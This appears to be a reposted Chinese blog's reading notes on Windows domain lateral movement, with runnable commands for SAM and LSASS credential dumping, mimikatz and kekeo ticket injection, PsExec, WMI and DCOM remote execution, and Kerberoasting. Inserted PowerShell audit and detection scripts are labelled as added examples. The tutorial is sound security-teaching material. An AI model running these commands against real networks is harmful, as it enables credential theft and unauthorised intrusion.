
Internal network security attack and defense: a practical guide to penetration testing (5): analysis and defense of lateral movement in the domain

2022-04-23 07:55:00 Fish in Siyuan Lake

Preface

Continuing my reading notes on the book Intranet Security Attack and Defense: A Practical Guide to Penetration Testing. This chapter systematically introduces the main methods of lateral movement within a domain, reproduces and analyses the most important and most classic vulnerabilities of intranet domains, and gives the corresponding defensive measures.

This chapter includes :

  • Analysis of common remote connection methods
  • Understanding the NTLM protocol from a cryptographic perspective
  • Principles of PTT and PTH
  • Lateral movement with PsExec, WMI and smbexec
  • The Kerberos authentication flow
  • Windows authentication hardening
  • Exchange mail server penetration testing

I have also written about this before: Intranet penetration series: Summary of lateral penetration methods

I. Commonly used Windows remote connections and commands

1. IPC

IPC (Internet Process Connection) is a named pipe opened for inter-process communication

  • The corresponding permissions are obtained by verifying a user name and password
  • Through ipc$ a connection can be established with the target machine, and commands can be run on the target over that connection

Establish an ipc$ connection:

net use \\192.168.1.10\ipc$ "admin123" /user:administrator

(1) Prerequisites

  • Ports 139 and 445 are open
  • The administrator has enabled the default shares

(2) Reasons a connection fails

  • Wrong user name or password
  • The target has not enabled the ipc$ default share
  • Ports 139 and 445 on the target cannot be reached
  • The command was typed incorrectly

2. Windows built-in tools

(1) dir

After establishing an ipc$ connection with the remote target using net use, dir can list the files on the remote host

dir \\192.168.1.10\c$

(2) tasklist

After establishing an ipc$ connection with the remote target using net use, tasklist can list the processes running on the remote host

tasklist /S 192.168.1.10 /U administrator /P admin123

3. Scheduled tasks

(1) at

The scheduled-task command on Windows Server 2008 and earlier

// Create a scheduled task that runs the shell at the given time
at \\192.168.1.10 4:11PM C:\shell.bat
// Creation returns a task ID; specifying that ID deletes the task
at \\192.168.1.10 7 /delete

(2) schtasks

The scheduled-task command on Windows Server 2008 and later

// Run at system startup
schtasks /create /s 192.168.1.10 /tn test /sc onstart /tr C:\calc.bat /ru system /f
// Run the task
schtasks /run /s 192.168.1.10 /i /tn "test"
// Delete the task
schtasks /delete /s 192.168.1.10 /tn "test" /f

II. Obtaining Windows system hash values

1. LM Hash and NTLM Hash

Windows uses two methods to encrypt plaintext passwords:

  • LM Hash: "LAN Manager Hash"; essentially DES encryption with a hard-coded key, limited to 14 characters (shorter passwords are padded with 0). Disabled by default since Windows Vista and Windows Server 2008, in which case the LM Hash is aad3b435b51404eeaad3b435b51404ee (meaning empty or disabled)
  • NTLM Hash: "New Technology LM Hash"; MD4 based, used since Windows Vista and Windows Server 2003

Hashes can be cracked with online databases, rainbow tables and so on, or used directly for lateral movement with PTH (Pass the Hash)

2. Grabbing passwords on a single machine

Tools can dump hash values and plaintext passwords from the memory of the lsass.exe process or export them from the SAM file

  • Local user names, hash values and other security verification information are stored in the SAM file at C:\Windows\System32\config; the file cannot be copied while Windows is running, but it can be copied by booting a PE system from a USB drive
  • The lsass.exe process implements the Windows local security policy and logon policy

To grab hash values or plaintext passwords on Windows, privileges must first be elevated to System

(1) Grabbing

Export the SAM and SYSTEM hive files, then read the hashes from them with mimikatz or Cain

reg save hklm\sam sam.hive
reg save hklm\system system.hive

Use Task Manager or Microsoft's Procdump to export an lsass.dmp file, then extract the hashes from the memory dump with mimikatz

Procdump download address: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Some tools:

  • GetPassword
  • PwDump7
  • QuarksPwDump
  • mimikatz
  • PowerShell

(2) Defence

Starting with Windows Server 2012, WDigest is disabled by default, so attackers can no longer obtain plaintext passwords from memory

On versions before 2012, installing the KB2871997 patch has the same effect

The WDigest state can be viewed and modified in the registry; the commands for turning it on and off from the command line are shown below

[Screenshot: registry commands for enabling and disabling WDigest]

3. Hashcat

Hashcat only supports CPU cracking; oclHashcat supports GPU cracking (AMD, NVIDIA). They can crack Windows, Linux, Office, Wi-Fi, MySQL and SQL Server passwords, as well as hashes produced by mainstream algorithms such as MD5, SHA1 and SHA256

Download address: https://github.com/hashcat/hashcat

4. Defence

Preventive measures:

  • Windows Server 2012 R2 added a new user group named Protected Users. Simply placing the users that need protection in this group prevents attackers from grabbing their plaintext passwords and hash values with mimikatz and similar tools

  • Install the KB2871997 patch. Microsoft released it to address remote access via PsExec or IPC (c$); it stops local accounts from accessing the computer remotely, with the exception of the local administrator account with SID 500 (Administrator by default)

  • Windows XP introduced a new protocol named WDigest, which makes Windows keep plaintext passwords in memory to simplify local logon. Modify the registry so that it stops doing this

  • The Debug privilege determines which users can attach a debugger to any process or to the kernel; by default only Administrator has it. mimikatz needs the Debug privilege to grab hash values or plaintext passwords (because it must interact with the lsass process). Remove Administrator from the Debug privilege
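The following script is an added example, not from the book or the original post: a read-only audit of the four defences above (WDigest registry switch, KB2871997, Debug privilege holders, Protected Users membership) on one host, plus a function that applies the WDigest setting. It assumes an elevated PowerShell session on a domain-joined Windows Server with the ActiveDirectory module available; the registry path and value name are the documented WDigest setting.

```powershell
# Added example: audit the credential-theft defences listed above (not code from the book or post).
function Get-CredentialTheftDefenceStatus {
    # 1. WDigest: UseLogonCredential = 0 stops LSASS from keeping plaintext passwords in memory.
    $wdKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $wdVal = (Get-ItemProperty -Path $wdKey -ErrorAction SilentlyContinue).UseLogonCredential

    # 2. KB2871997: backports the WDigest switch and the SID-500-only local account behaviour.
    $kb = Get-HotFix -Id 'KB2871997' -ErrorAction SilentlyContinue

    # 3. SeDebugPrivilege holders, read from an export of the local security policy.
    $cfg = Join-Path $env:TEMP 'user_rights.inf'
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $debugLine = Select-String -Path $cfg -Pattern '^SeDebugPrivilege' | Select-Object -First 1
    Remove-Item $cfg -ErrorAction SilentlyContinue
    $debugHolders = if ($debugLine) { ($debugLine.Line -split '=')[1].Trim() } else { '(none)' }

    # 4. Protected Users: members cannot use NTLM, RC4/DES Kerberos keys or delegation.
    try {
        $protected = (Get-ADGroupMember -Identity 'Protected Users' -ErrorAction Stop).SamAccountName -join ','
    } catch {
        $protected = '(ActiveDirectory module unavailable or not domain-joined)'
    }

    [PSCustomObject]@{
        WDigestUseLogonCredential = if ($null -eq $wdVal) { 'not set (OS default applies)' } else { $wdVal }
        WDigestExplicitlyDisabled = ($wdVal -eq 0)
        KB2871997Installed        = [bool]$kb
        SeDebugPrivilegeHolders   = $debugHolders   # *S-1-5-32-544 is the local Administrators group
        ProtectedUsersMembers     = $protected
    }
}

# The only change this script can make: pin WDigest to "do not cache logon credentials".
function Disable-WDigestLogonCredential {
    $wdKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    New-ItemProperty -Path $wdKey -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null
}

Get-CredentialTheftDefenceStatus | Format-List
```

Setting UseLogonCredential takes effect for new logons only; sessions that already cached a plaintext password keep it until the user logs off.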

III. Pass-the-hash attack

Pass the Hash (PTH) attack:

  • In a domain environment, users mostly log on with domain accounts, and many computers are given the same local administrator account and password during installation
  • So if the local administrator account and password are the same on several computers, an attacker can log on to other computers in the intranet with a pass-the-hash attack

Put simply, a tool passes the hash value to another computer, the computer accepts it as authentication, and the attacker gains control of the remote machine

In practice, after KB2871997 is installed, conventional pass-the-hash no longer works for lateral movement, with the exception of the Administrator account (SID 500): its hash can still be passed. Note that what matters is the account with SID 500 (renaming the Administrator account does not change its SID)

IV. Pass-the-ticket attack

Pass the Ticket (PTT) does not require local administrator privileges

1. mimikatz

// Export tickets
mimikatz "privilege::debug" "sekurlsa::tickets /export"
// Purge the tickets in memory
mimikatz # kerberos::purge
// Inject a ticket into memory
mimikatz "kerberos::ptt" "C:\ticket\<ticket file name>"

2. kekeo

kekeo needs a domain name, a user name and an NTLM hash together to generate a ticket

Download address: https://github.com/gentilkiwi/kekeo

// Generate a ticket
kekeo "tgt::ask /user:administrator /domain:test.com /ntlm:<ntlm hash value>"
// Purge the other tickets in memory
kekeo # kerberos::purge
// Import into memory
kerberos::ptt <ticket file name>

3. Defence

A few points:

  • When using the dir command, the host name must be used (an IP address causes an error)
  • Tickets remain valid in memory for 10 hours by default
  • Tickets can be passed on the target machine without local administrator privileges

V. PsExec

PsExec is part of Microsoft's official PsTools toolkit

  • It was originally intended mainly for bulk maintenance of Windows hosts and works very well in domain environments
  • With PsExec you can execute commands on a remote computer and also elevate administrator privileges to System to run a specified program
  • Works on Windows Server 2016 and earlier
  • Download address: https://download.sysinternals.com/files/PSTools.zip

Basic principle of PsExec: it creates a psexec service on the remote target computer through a named pipe, writes a binary named PSEXESVC to disk, runs the command through the psexec service, and deletes the service after the command finishes

The remote system must have the admin$ share enabled (it is enabled by default); PsExec leaves a lot of logs

// Get a System-privilege shell (ipc$ already established); without -s the shell has administrator privileges
PsExec.exe -accepteula \\192.168.1.10 -s cmd.exe
// Without an ipc$ connection
PsExec.exe \\192.168.1.10 -u administrator -p 123456 cmd.exe

VI. WMI

WMI (Windows Management Instrumentation) is a collection of management tools

  • Supported since Windows 98
  • Can manage computer systems locally or remotely
  • When wmiexec is used for lateral movement, Windows does not log WMI operations by default

1. Basic commands

The basic way to execute a command:

wmic /node:192.168.1.10 /user:administrator /password:admin123 process call create "cmd.exe /c ipconfig > ip.txt"

Using wmic to execute commands remotely starts the Windows Management Instrumentation service on the remote system (port 135 must be open on the target, and wmic commands run on the remote system with administrator privileges). If the server's firewall is on, wmic cannot connect. Also, wmic commands return no output, so the command result can be written to a file and read via ipc$ and type. If wmic runs a malicious program, no log is produced
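As an added example (not from the book or the original post), this script hunts the local event logs for the two traces discussed in the PsExec and WMI sections: the PSEXESVC service installation PsExec leaves in the System log (event 7045), and processes started under WmiPrvSE.exe, which is how a remote "process call create" appears in the Security log (event 4688, which only exists when process creation auditing with command-line logging is enabled). It assumes an elevated session; the 24-hour window is an arbitrary choice.

```powershell
# Added example: detect PsExec service installs and WMI-spawned shells (not code from the book or post).
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    # Turn the <EventData> of an event into a hashtable keyed by each Data element's Name attribute.
    $xml = [xml]$Event.ToXml()
    $h = @{}
    foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
    return $h
}

function Find-PsExecServiceInstall {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = ConvertFrom-EventData $_
        # A renamed PsExec clone may change the service name, so match the image path as well.
        if ($d.ServiceName -match 'PSEXESVC' -or $d.ImagePath -match 'PSEXESVC') {
            [PSCustomObject]@{
                Time    = $_.TimeCreated
                Service = $d.ServiceName
                Image   = $d.ImagePath
                Account = $d.AccountName
            }
        }
    }
}

function Find-WmiSpawnedProcess {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = ConvertFrom-EventData $_
        # WmiPrvSE.exe as the parent of cmd.exe or powershell.exe is the classic remote-WMI pattern.
        if ($d.ParentProcessName -match 'WmiPrvSE\.exe$' -and $d.NewProcessName -match '(cmd|powershell)\.exe$') {
            [PSCustomObject]@{
                Time        = $_.TimeCreated
                User        = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Process     = $d.NewProcessName
                CommandLine = $d.CommandLine
            }
        }
    }
}

Find-PsExecServiceInstall | Format-Table -AutoSize
Find-WmiSpawnedProcess   | Format-Table -AutoSize
```

Because the page notes that WMI leaves no log by default, the second function finds nothing until "Audit Process Creation" and "Include command line in process creation events" are turned on by policy.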

2. Other tools

(1) wmiexec from impacket

Install impacket on Kali

  • After a successful connection there is an interactive command line
  • Mainly used from Linux to Windows

wmiexec.py administrator:<password>@<target IP>

(2) wmiexec.vbs

wmiexec.vbs calls WMI through VBS to emulate the functionality of PsExec (it has long been detected and blocked by antivirus software)

// Interactive shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.10 administrator admin123
// Execute a single command
cscript.exe wmiexec.vbs /cmd 192.168.1.10 administrator admin123 "ipconfig"

(3) Invoke-WMICommand

Invoke-WMICommand is a script in PowerSploit; it calls WMI from PowerShell to execute commands remotely

# Target user name
$user = "test\administrator"
# Target password
$password = ConvertTo-SecureString -String "admin123" -AsPlainText -Force
# Combine into a credential object
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
# Remote execution
$remote = Invoke-WmiCommand -Payload { ipconfig } -Credential $Cred -ComputerName 192.168.1.10
# Output
$remote.PayloadOutput

(4) Invoke-WMIMethod

Invoke-WMIMethod is built into PowerShell

# Target user name
$user = "test\administrator"
# Target password
$password = ConvertTo-SecureString -String "admin123" -AsPlainText -Force
# Combine into a credential object
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
# Remote execution
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "ipconfig" -ComputerName "192.168.1.10" -Credential $Cred

VII. smbexec

smbexec can execute commands on a remote system through file shares (admin$, c$, ipc$, d$)

Download address:

This article introduces how to use it

VIII. Using DCOM on remote systems

DCOM (Distributed Component Object Model) is a set of Microsoft concepts and program interfaces

  • It is based on the Component Object Model (COM), which provides a set of interfaces that allow a client and a server on the same computer to communicate (Windows 95 and later)
  • A client program object can send requests to a server program object on another computer in the network

The execution procedure is the same as before:

  • Connect to the remote computer via ipc$
  • Execute commands

1. Executing commands via local DCOM

Get the list of DCOM applications:

# Get-CimInstance exists only in PowerShell 3.0 and later, i.e. Server 2012 and above
Get-CimInstance Win32_DCOMApplication
# In PowerShell 2.0 the following command can be used instead
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

2. Using DCOM to execute commands on a remote machine

(1) Calling MMC20.Application to execute a command remotely

net use \\192.168.1.10 "admin123" /user:test\xiaom
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c cmd.exe","")

(2) Calling CLSID 9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1.10")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

For details of this method see: https://bbs.pediy.com/thread-226540-1.htm

IX. SPN in a domain environment

Service Principal Name (SPN)

  • Many applications contain a variety of resources
  • Each resource is assigned a different SPN

1. SPN scanning

Because every server in a domain must register its SPNs with the Kerberos authentication service, an attacker can send queries directly to the domain controller to obtain the SPNs of the services they are interested in, and thereby learn which machine hosts those service resources.

SPN scanning is also called "scanning Kerberos service instance names", and it is the best way to find services in Active Directory. Compared with network port scanning, its main feature is that it does not need to connect to every IP address in the network to check service ports (so it does not trigger the rules of intranet IPS, IDS and similar devices and generate large numbers of alert logs). Because SPN queries are part of normal Kerberos ticket behaviour, they are hard to detect.

The PowerShell-AD-Recon toolkit provides a series of mappings between services, the accounts they run under and the hosts running them. Download address: https://github.com/PyroTek3/PowerShell-AD-Recon

SPNs are queried from the domain controller over LDAP, so an attacker only needs ordinary domain user privileges to perform SPN scanning

2. Kerberoast attack

Download address: https://github.com/nidem/kerberoast

Details: Intranet penetration | SPN and Kerberoast attack explained

Related: Learn about golden tickets and silver tickets

Defence:

  • Ensure service account passwords are longer than 25 characters
  • Ensure passwords are random (avoid reusing the same password)
  • Change passwords regularly
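The following is an added example, not from the book or the original post, giving the defender's side of the SPN scanning and Kerberoast sections: an audit of user accounts that carry an SPN (the only roastable kind) and a detection over the DC's Kerberos service ticket events. It assumes the ActiveDirectory module on a domain-joined host and "Audit Kerberos Service Ticket Operations" enabled on the domain controller (Security event 4769); the 180-day age limit and the 10-SPN burst threshold are constructed values. Password length cannot be read from the directory, so the audit checks password age, negotiable encryption types and Protected Users membership instead.

```powershell
# Added example: Kerberoast exposure audit and RC4 ticket-request burst detection (not code from the book or post).
function Get-KerberoastableAccountAudit {
    param([int]$MaxPasswordAgeDays = 180)
    # Only user accounts with an SPN matter: their password is the key of every service ticket issued
    # for that SPN. Computer accounts rotate their keys automatically and are excluded by Get-ADUser.
    $props = 'ServicePrincipalName', 'PasswordLastSet', 'msDS-SupportedEncryptionTypes', 'MemberOf'
    Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties $props | ForEach-Object {
        $enc = $_.'msDS-SupportedEncryptionTypes'
        $ageDays = if ($_.PasswordLastSet) { [int]((Get-Date) - $_.PasswordLastSet).TotalDays } else { -1 }
        [PSCustomObject]@{
            Account         = $_.SamAccountName
            SPNs            = ($_.ServicePrincipalName -join ' ')
            PasswordAgeDays = $ageDays
            # 0x08 = AES128, 0x10 = AES256. If neither bit is set the KDC may issue RC4 tickets,
            # which are the fast offline-crack path Kerberoast relies on.
            AesSupported    = [bool]($enc -band 0x18)
            ProtectedUser   = [bool]($_.MemberOf -match 'CN=Protected Users,')
            StalePassword   = ($ageDays -lt 0) -or ($ageDays -gt $MaxPasswordAgeDays)
        }
    }
}

function Find-KerberoastRequestBurst {
    param([int]$Threshold = 10, [datetime]$Since = (Get-Date).AddHours(-1))
    # One requester asking for many RC4 (0x17) service tickets for different SPNs in a short window
    # is the signature of tools that pull every roastable ticket at once.
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = [xml]$_.ToXml()
        $h = @{}
        foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
        # Drop machine-account services (name ends in $); they are not roastable.
        if ($h.TicketEncryptionType -eq '0x17' -and $h.ServiceName -notmatch '\$$') { [PSCustomObject]$h }
    } | Group-Object TargetUserName | ForEach-Object {
        $distinct = ($_.Group.ServiceName | Sort-Object -Unique).Count
        if ($distinct -ge $Threshold) {
            [PSCustomObject]@{ Requester = $_.Name; DistinctSPNs = $distinct; SourceIPs = ($_.Group.IpAddress | Sort-Object -Unique) -join ',' }
        }
    }
}

Get-KerberoastableAccountAudit | Where-Object { $_.StalePassword -or -not $_.AesSupported } | Format-Table -AutoSize
Find-KerberoastRequestBurst | Format-Table -AutoSize
```

Run the second function on a domain controller (or against forwarded DC logs), since 4769 is only written by the KDC.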

X. Exchange mail server security

Email may contain a great deal of source code, internal company address books, plaintext passwords, login addresses of sensitive services, VPN account credentials that give access to the intranet from outside, and other information

Exchange can be operated locally or remotely with PowerShell.

The Mailbox server, Client Access server and Hub Transport server are the core roles; deploying these three provides basic email processing, and all three can be deployed on the same host.

Mail sending uses a single protocol, SMTP (Simple Mail Transfer Protocol); mail retrieval uses several standards, such as POP3, developed from POP (Post Office Protocol), and the widely used IMAP (Internet Message Access Protocol). Exchange also developed the proprietary MAPI protocol for receiving mail

Exchange access interfaces and protocols:

  • OWA (Outlook Web App): the web mailbox provided by Exchange
  • EAC (Exchange Administrative Center): the Exchange management console (back end)
  • Outlook Anywhere (RPC-over-HTTP, RPC/HTTP)
  • MAPI (MAPI-over-HTTP, MAPI/HTTP)
  • Exchange ActiveSync (EAS, XML/HTTP)
  • Exchange Web Service (EWS, SOAP-over-HTTP)

Exchange service discovery:

  • Port scanning (nmap)
  • SPN query (when Exchange is installed, its SPNs are registered in AD)

Exchange database files have the suffix ".edb" and are stored on the Exchange server; their details can be viewed with PowerShell

Exchange mail files have the suffix ".pst"

UNC (Universal Naming Convention, also translated as the general or universal naming convention). Network paths such as \\hostname\sharename or \\ip_address\sharename are UNC paths; sharename is the name of the network share

Viewing the mail database

# The Exchange snap-in must be loaded before querying
Add-PSSnapin Microsoft.Exchange*
Get-MailboxDatabase -Server "Exchange1"
Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

Conclusion

Some classic lateral movement methods; many of them have long been detected and blocked by antivirus software

Copyright notice
This article was written by [Fish in Siyuan Lake]. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/04/202204230628265368.html